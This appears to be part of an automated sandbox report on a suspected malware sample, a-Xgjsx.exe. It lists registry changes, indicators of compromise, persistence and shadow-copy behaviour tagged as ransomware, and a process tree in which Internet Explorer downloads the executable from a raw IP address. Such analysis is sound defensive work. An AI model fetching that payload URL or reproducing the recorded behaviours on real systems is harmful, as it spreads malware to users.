Set value (int)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 = 14002e8005398e082303024b98265d99428e115f0000	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\NodeSlot = "3"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\MRUListEx = ffffffff	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0000000001000000ffffffff	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Mode = "1"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = ffffffff	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0000000001000000ffffffff	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0100000000000000ffffffff	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupView = "0"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:PID = "0"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByDirection = "1"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\LogicalViewMode = "3"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Generic"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	chrome.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

Processes:

chrome.exetaskmgr.exepowershell.exea-Xgjsx.exe

pid	process
360	chrome.exe
360	chrome.exe
2112	taskmgr.exe
2112	taskmgr.exe
2112	taskmgr.exe
3248	powershell.exe
3248	powershell.exe
3248	powershell.exe
2104	a-Xgjsx.exe
2104	a-Xgjsx.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

mmc.exe

pid process

3548 mmc.exe

pid	process
3548	mmc.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 13 IoCs

Processes:

chrome.exe

pid	process
360	chrome.exe
360	chrome.exe
360	chrome.exe
360	chrome.exe
360	chrome.exe
360	chrome.exe
360	chrome.exe
360	chrome.exe
360	chrome.exe
360	chrome.exe
360	chrome.exe
360	chrome.exe
360	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

chrome.exe

description	pid	process
Token: SeShutdownPrivilege	360	chrome.exe
Token: SeCreatePagefilePrivilege	360	chrome.exe
Token: SeShutdownPrivilege	360	chrome.exe
Token: SeCreatePagefilePrivilege	360	chrome.exe
Token: SeShutdownPrivilege	360	chrome.exe
Token: SeCreatePagefilePrivilege	360	chrome.exe
Token: SeShutdownPrivilege	360	chrome.exe
Token: SeCreatePagefilePrivilege	360	chrome.exe
Token: SeShutdownPrivilege	360	chrome.exe
Token: SeCreatePagefilePrivilege	360	chrome.exe
Token: SeShutdownPrivilege	360	chrome.exe
Token: SeCreatePagefilePrivilege	360	chrome.exe
Token: SeShutdownPrivilege	360	chrome.exe
Token: SeCreatePagefilePrivilege	360	chrome.exe
Token: SeShutdownPrivilege	360	chrome.exe
Token: SeCreatePagefilePrivilege	360	chrome.exe
Token: SeShutdownPrivilege	360	chrome.exe
Token: SeCreatePagefilePrivilege	360	chrome.exe
Token: SeShutdownPrivilege	360	chrome.exe
Token: SeCreatePagefilePrivilege	360	chrome.exe
Token: SeShutdownPrivilege	360	chrome.exe
Token: SeCreatePagefilePrivilege	360	chrome.exe
Token: SeShutdownPrivilege	360	chrome.exe
Token: SeCreatePagefilePrivilege	360	chrome.exe
Token: SeShutdownPrivilege	360	chrome.exe
Token: SeCreatePagefilePrivilege	360	chrome.exe
Token: SeShutdownPrivilege	360	chrome.exe
Token: SeCreatePagefilePrivilege	360	chrome.exe
Token: SeShutdownPrivilege	360	chrome.exe
Token: SeCreatePagefilePrivilege	360	chrome.exe
Token: SeShutdownPrivilege	360	chrome.exe
Token: SeCreatePagefilePrivilege	360	chrome.exe
Token: SeShutdownPrivilege	360	chrome.exe
Token: SeCreatePagefilePrivilege	360	chrome.exe
Token: SeShutdownPrivilege	360	chrome.exe
Token: SeCreatePagefilePrivilege	360	chrome.exe
Token: SeShutdownPrivilege	360	chrome.exe
Token: SeCreatePagefilePrivilege	360	chrome.exe
Token: SeShutdownPrivilege	360	chrome.exe
Token: SeCreatePagefilePrivilege	360	chrome.exe
Token: SeShutdownPrivilege	360	chrome.exe
Token: SeCreatePagefilePrivilege	360	chrome.exe
Token: SeShutdownPrivilege	360	chrome.exe
Token: SeCreatePagefilePrivilege	360	chrome.exe
Token: SeShutdownPrivilege	360	chrome.exe
Token: SeCreatePagefilePrivilege	360	chrome.exe
Token: SeShutdownPrivilege	360	chrome.exe
Token: SeCreatePagefilePrivilege	360	chrome.exe
Token: SeShutdownPrivilege	360	chrome.exe
Token: SeCreatePagefilePrivilege	360	chrome.exe
Token: SeShutdownPrivilege	360	chrome.exe
Token: SeCreatePagefilePrivilege	360	chrome.exe
Token: SeShutdownPrivilege	360	chrome.exe
Token: SeCreatePagefilePrivilege	360	chrome.exe
Token: SeShutdownPrivilege	360	chrome.exe
Token: SeCreatePagefilePrivilege	360	chrome.exe
Token: SeShutdownPrivilege	360	chrome.exe
Token: SeCreatePagefilePrivilege	360	chrome.exe
Token: SeShutdownPrivilege	360	chrome.exe
Token: SeCreatePagefilePrivilege	360	chrome.exe
Token: SeShutdownPrivilege	360	chrome.exe
Token: SeCreatePagefilePrivilege	360	chrome.exe
Token: SeShutdownPrivilege	360	chrome.exe
Token: SeCreatePagefilePrivilege	360	chrome.exe

Suspicious use of FindShellTrayWindow 58 IoCs

Processes:

iexplore.exechrome.exetaskmgr.exe

pid	process
2600	iexplore.exe
2600	iexplore.exe
360	chrome.exe
360	chrome.exe
360	chrome.exe
360	chrome.exe
360	chrome.exe
360	chrome.exe
360	chrome.exe
360	chrome.exe
360	chrome.exe
360	chrome.exe
360	chrome.exe
360	chrome.exe
360	chrome.exe
360	chrome.exe
360	chrome.exe
360	chrome.exe
360	chrome.exe
360	chrome.exe
360	chrome.exe
360	chrome.exe
360	chrome.exe
360	chrome.exe
360	chrome.exe
360	chrome.exe
360	chrome.exe
360	chrome.exe
360	chrome.exe
2112	taskmgr.exe
2112	taskmgr.exe
2112	taskmgr.exe
2112	taskmgr.exe
2112	taskmgr.exe
2112	taskmgr.exe
2112	taskmgr.exe
2112	taskmgr.exe
2112	taskmgr.exe
2112	taskmgr.exe
2112	taskmgr.exe
2112	taskmgr.exe
2112	taskmgr.exe
2112	taskmgr.exe
2112	taskmgr.exe
2112	taskmgr.exe
2112	taskmgr.exe
2112	taskmgr.exe
2112	taskmgr.exe
2112	taskmgr.exe
2112	taskmgr.exe
2112	taskmgr.exe
2112	taskmgr.exe
2112	taskmgr.exe
2112	taskmgr.exe
2112	taskmgr.exe
2112	taskmgr.exe
2112	taskmgr.exe
2112	taskmgr.exe

Suspicious use of SendNotifyMessage 53 IoCs

Processes:

chrome.exetaskmgr.exe

pid	process
360	chrome.exe
360	chrome.exe
360	chrome.exe
360	chrome.exe
360	chrome.exe
360	chrome.exe
360	chrome.exe
360	chrome.exe
360	chrome.exe
360	chrome.exe
360	chrome.exe
360	chrome.exe
360	chrome.exe
360	chrome.exe
360	chrome.exe
360	chrome.exe
360	chrome.exe
360	chrome.exe
360	chrome.exe
360	chrome.exe
360	chrome.exe
360	chrome.exe
360	chrome.exe
360	chrome.exe
2112	taskmgr.exe
2112	taskmgr.exe
2112	taskmgr.exe
2112	taskmgr.exe
2112	taskmgr.exe
2112	taskmgr.exe
2112	taskmgr.exe
2112	taskmgr.exe
2112	taskmgr.exe
2112	taskmgr.exe
2112	taskmgr.exe
2112	taskmgr.exe
2112	taskmgr.exe
2112	taskmgr.exe
2112	taskmgr.exe
2112	taskmgr.exe
2112	taskmgr.exe
2112	taskmgr.exe
2112	taskmgr.exe
2112	taskmgr.exe
2112	taskmgr.exe
2112	taskmgr.exe
2112	taskmgr.exe
2112	taskmgr.exe
2112	taskmgr.exe
2112	taskmgr.exe
2112	taskmgr.exe
2112	taskmgr.exe
2112	taskmgr.exe

Suspicious use of SetWindowsHookEx 9 IoCs

Processes:

iexplore.exeIEXPLORE.EXEchrome.exemmc.exe

pid process

2600 iexplore.exe
2600 iexplore.exe
2516 IEXPLORE.EXE
2516 IEXPLORE.EXE
3400 chrome.exe
3400 chrome.exe
3400 chrome.exe
3548 mmc.exe
3548 mmc.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

iexplore.exechrome.exe

description	pid	process	target process
PID 2600 wrote to memory of 2516	2600	iexplore.exe	IEXPLORE.EXE
PID 2600 wrote to memory of 2516	2600	iexplore.exe	IEXPLORE.EXE
PID 2600 wrote to memory of 2516	2600	iexplore.exe	IEXPLORE.EXE
PID 360 wrote to memory of 4648	360	chrome.exe	chrome.exe
PID 360 wrote to memory of 4648	360	chrome.exe	chrome.exe
PID 360 wrote to memory of 3944	360	chrome.exe	chrome.exe
PID 360 wrote to memory of 3944	360	chrome.exe	chrome.exe
PID 360 wrote to memory of 3944	360	chrome.exe	chrome.exe
PID 360 wrote to memory of 3944	360	chrome.exe	chrome.exe
PID 360 wrote to memory of 3944	360	chrome.exe	chrome.exe
PID 360 wrote to memory of 3944	360	chrome.exe	chrome.exe
PID 360 wrote to memory of 3944	360	chrome.exe	chrome.exe
PID 360 wrote to memory of 3944	360	chrome.exe	chrome.exe
PID 360 wrote to memory of 3944	360	chrome.exe	chrome.exe
PID 360 wrote to memory of 3944	360	chrome.exe	chrome.exe
PID 360 wrote to memory of 3944	360	chrome.exe	chrome.exe
PID 360 wrote to memory of 3944	360	chrome.exe	chrome.exe
PID 360 wrote to memory of 3944	360	chrome.exe	chrome.exe
PID 360 wrote to memory of 3944	360	chrome.exe	chrome.exe
PID 360 wrote to memory of 3944	360	chrome.exe	chrome.exe
PID 360 wrote to memory of 3944	360	chrome.exe	chrome.exe
PID 360 wrote to memory of 3944	360	chrome.exe	chrome.exe
PID 360 wrote to memory of 3944	360	chrome.exe	chrome.exe
PID 360 wrote to memory of 3944	360	chrome.exe	chrome.exe
PID 360 wrote to memory of 3944	360	chrome.exe	chrome.exe
PID 360 wrote to memory of 3944	360	chrome.exe	chrome.exe
PID 360 wrote to memory of 3944	360	chrome.exe	chrome.exe
PID 360 wrote to memory of 3944	360	chrome.exe	chrome.exe
PID 360 wrote to memory of 3944	360	chrome.exe	chrome.exe
PID 360 wrote to memory of 3944	360	chrome.exe	chrome.exe
PID 360 wrote to memory of 3944	360	chrome.exe	chrome.exe
PID 360 wrote to memory of 3944	360	chrome.exe	chrome.exe
PID 360 wrote to memory of 3944	360	chrome.exe	chrome.exe
PID 360 wrote to memory of 3944	360	chrome.exe	chrome.exe
PID 360 wrote to memory of 3944	360	chrome.exe	chrome.exe
PID 360 wrote to memory of 3944	360	chrome.exe	chrome.exe
PID 360 wrote to memory of 3944	360	chrome.exe	chrome.exe
PID 360 wrote to memory of 3944	360	chrome.exe	chrome.exe
PID 360 wrote to memory of 3944	360	chrome.exe	chrome.exe
PID 360 wrote to memory of 3944	360	chrome.exe	chrome.exe
PID 360 wrote to memory of 3944	360	chrome.exe	chrome.exe
PID 360 wrote to memory of 3944	360	chrome.exe	chrome.exe
PID 360 wrote to memory of 3944	360	chrome.exe	chrome.exe
PID 360 wrote to memory of 1284	360	chrome.exe	chrome.exe
PID 360 wrote to memory of 1284	360	chrome.exe	chrome.exe
PID 360 wrote to memory of 4792	360	chrome.exe	chrome.exe
PID 360 wrote to memory of 4792	360	chrome.exe	chrome.exe
PID 360 wrote to memory of 4792	360	chrome.exe	chrome.exe
PID 360 wrote to memory of 4792	360	chrome.exe	chrome.exe
PID 360 wrote to memory of 4792	360	chrome.exe	chrome.exe
PID 360 wrote to memory of 4792	360	chrome.exe	chrome.exe
PID 360 wrote to memory of 4792	360	chrome.exe	chrome.exe
PID 360 wrote to memory of 4792	360	chrome.exe	chrome.exe
PID 360 wrote to memory of 4792	360	chrome.exe	chrome.exe
PID 360 wrote to memory of 4792	360	chrome.exe	chrome.exe
PID 360 wrote to memory of 4792	360	chrome.exe	chrome.exe
PID 360 wrote to memory of 4792	360	chrome.exe	chrome.exe
PID 360 wrote to memory of 4792	360	chrome.exe	chrome.exe
PID 360 wrote to memory of 4792	360	chrome.exe	chrome.exe
PID 360 wrote to memory of 4792	360	chrome.exe	chrome.exe
PID 360 wrote to memory of 4792	360	chrome.exe	chrome.exe
PID 360 wrote to memory of 4792	360	chrome.exe	chrome.exe
PID 360 wrote to memory of 4792	360	chrome.exe	chrome.exe
PID 360 wrote to memory of 4792	360	chrome.exe	chrome.exe

System policy modification 1 TTPs 1 IoCs

evasion

Modify Registry

Processes:

a-Xgjsx.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "0"	a-Xgjsx.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" http://80.66.75.37/a-Xgjsx.exe
1⤵
- Modifies Internet Explorer Phishing Filter
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2600

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2600 CREDAT:82945 /prefetch:2
2⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2516

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:360

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff884189758,0x7ff884189768,0x7ff884189778
2⤵
PID:4648

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1604 --field-trial-handle=1720,i,15101431607290005894,1740302005090716142,131072 /prefetch:2
2⤵
PID:3944

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=480 --field-trial-handle=1720,i,15101431607290005894,1740302005090716142,131072 /prefetch:8
2⤵
PID:1284

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2080 --field-trial-handle=1720,i,15101431607290005894,1740302005090716142,131072 /prefetch:8
2⤵
PID:4792

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3104 --field-trial-handle=1720,i,15101431607290005894,1740302005090716142,131072 /prefetch:1
2⤵
PID:1316

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3084 --field-trial-handle=1720,i,15101431607290005894,1740302005090716142,131072 /prefetch:1
2⤵
PID:4912

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4392 --field-trial-handle=1720,i,15101431607290005894,1740302005090716142,131072 /prefetch:8
2⤵
PID:4772

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4544 --field-trial-handle=1720,i,15101431607290005894,1740302005090716142,131072 /prefetch:1
2⤵
PID:4420

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4696 --field-trial-handle=1720,i,15101431607290005894,1740302005090716142,131072 /prefetch:8
2⤵
PID:4364

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4832 --field-trial-handle=1720,i,15101431607290005894,1740302005090716142,131072 /prefetch:8
2⤵
PID:5108

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4976 --field-trial-handle=1720,i,15101431607290005894,1740302005090716142,131072 /prefetch:8
2⤵
PID:4996

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4844 --field-trial-handle=1720,i,15101431607290005894,1740302005090716142,131072 /prefetch:8
2⤵
PID:824

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4912 --field-trial-handle=1720,i,15101431607290005894,1740302005090716142,131072 /prefetch:8
2⤵
PID:1164

C:\Program Files\Google\Chrome\Application\chrome.exe
